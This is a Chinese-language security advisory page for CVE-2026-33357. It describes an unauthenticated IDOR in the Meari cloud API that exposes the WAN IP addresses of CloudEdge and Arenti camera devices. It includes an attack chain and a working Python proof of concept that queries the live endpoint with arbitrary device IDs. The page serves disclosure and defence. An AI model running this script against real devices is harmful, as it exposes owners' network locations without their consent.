IPBUF安全漏洞报告
English
CVE-2026-33357 CVSS 7.5 高危

CVE-2026-33357 Meari SDK信息泄露漏洞

披露日期: 2026-05-11
来源: 44488dab-36db-4358-99f9-bc116477f914

漏洞信息

漏洞编号
CVE-2026-33357
漏洞类型
信息泄露
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Meari SDK, CloudEdge, Arenti

相关标签

信息泄露IDORMeariCloudEdgeArenti权限绕过

漏洞概述

该漏洞影响嵌入 "com.meari.sdk" 的 Meari 客户端应用程序,包括 CloudEdge 5.5.0 build 220、Arenti 1.8.1 build 220 及相关白标版本(<= 1.8.x)。由于服务器端在处理 "GET /openapi/device/status" 请求时存在授权验证缺失,攻击者可滥用指向 openapi-euce.mearicloud.com 的调用路径,无需认证即可检索任意设备的 WAN IP 数据。此问题可能导致敏感设备位置信息泄露。

技术细节

该漏洞的根本原因在于 Meari 云服务端 API 接口 `/openapi/device/status` 存在服务器端授权失败。攻击者无需用户交互或身份认证,即可通过网络向该接口发送恶意请求。由于服务器未能正确校验请求者是否有权访问指定设备的状态信息,攻击者可以通过遍历或猜测设备 ID,向 `openapi-euce.mearicloud.com` 发送 GET 请求。成功利用该漏洞后,服务器将返回目标设备的广域网 IP 地址。这种不安全的直接对象引用(IDOR)使得攻击者能够获取设备的网络位置信息,为进一步的物理定位或网络攻击提供数据支持。

攻击链分析

STEP 1
侦察
识别使用受影响 Meari SDK 的应用程序(CloudEdge, Arenti 等)及其关联的设备 ID。
STEP 2
漏洞利用
向 openapi-euce.mearicloud.com 发送未经授权的 GET 请求至 /openapi/device/status 端点,并在参数中指定目标设备 ID。
STEP 3
信息泄露
服务器因授权验证失败,返回目标设备的 WAN IP 地址及其他状态信息,导致数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target endpoint based on the vulnerability description target_url = "https://openapi-euce.mearicloud.com/openapi/device/status" # Headers to mimic a legitimate client request if necessary (though auth is not required) headers = { "User-Agent": "Meari-Scanner/1.0", "Accept": "application/json" } # Parameters to request status of an arbitrary device # In a real attack, the attacker would iterate or guess device IDs params = { "deviceId": "TARGET_DEVICE_ID_HERE" # Replace with the target device ID } try: # Sending the GET request without authentication response = requests.get(target_url, headers=headers, params=params, timeout=10) if response.status_code == 200: print("[+] Vulnerability Exploited Successfully!") print("[+] Device Status Data:") print(response.json()) else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

CloudEdge 5.5.0 build 220
Arenti 1.8.1 build 220
Meari SDK 相关白标版本 <= 1.8.x

防御指南

临时缓解措施
建议立即停止使用受影响版本的 SDK 和应用程序,并联系供应商获取安全更新。在未修复前,建议限制相关设备的网络访问权限,以降低信息泄露风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。